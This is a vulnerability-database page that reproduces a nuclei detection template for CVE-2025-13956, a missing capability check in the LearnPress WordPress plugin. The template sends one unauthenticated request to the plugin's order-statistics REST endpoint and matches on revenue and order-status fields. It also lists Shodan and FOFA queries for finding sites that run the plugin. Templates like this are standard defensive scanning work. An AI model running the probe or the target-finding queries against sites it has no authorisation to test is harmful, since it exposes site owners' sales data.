Lucene search
K

LearnPress < 4.3.2 - Broken Access Control

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Unauthenticated access to LearnPress orders statistics up to version 4.3.1; update beyond 4.3.1.

Related
Refs
Code
id: CVE-2025-13956

info:
  name: LearnPress < 4.3.2 - Broken Access Control
  author: pussycat0x
  severity: medium
  description: |
    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts.
  impact: |
    Unauthenticated attackers can view sensitive order statistics including revenue and order status, leading to information disclosure.
  remediation: |
    Update to a version later than 4.3.1 or the latest available version.
  reference:
    - https://wpscan.com/vulnerability/b4c0e309-45d1-4b00-875d-ec8a76910253/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13956
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-13956
    epss-score: 0.00917
    epss-percentile: 0.55908
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,learnpress,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/lp/v1/orders/statistic"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "total-raised", "order-completed", "order-pending", "order-cancelled", "Total Raised")'
          - 'contains(body, "status\":\"success")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502202fc19b77a1d6f3ac2d9bfaa0a18c8df67fa2721faeb8ef11e04d300c73398349022100c79ab6e198ed0522cff099b96c6eee1e39e9c089647368b211c5dadce662e23f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 19:25Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00917
SSVC
26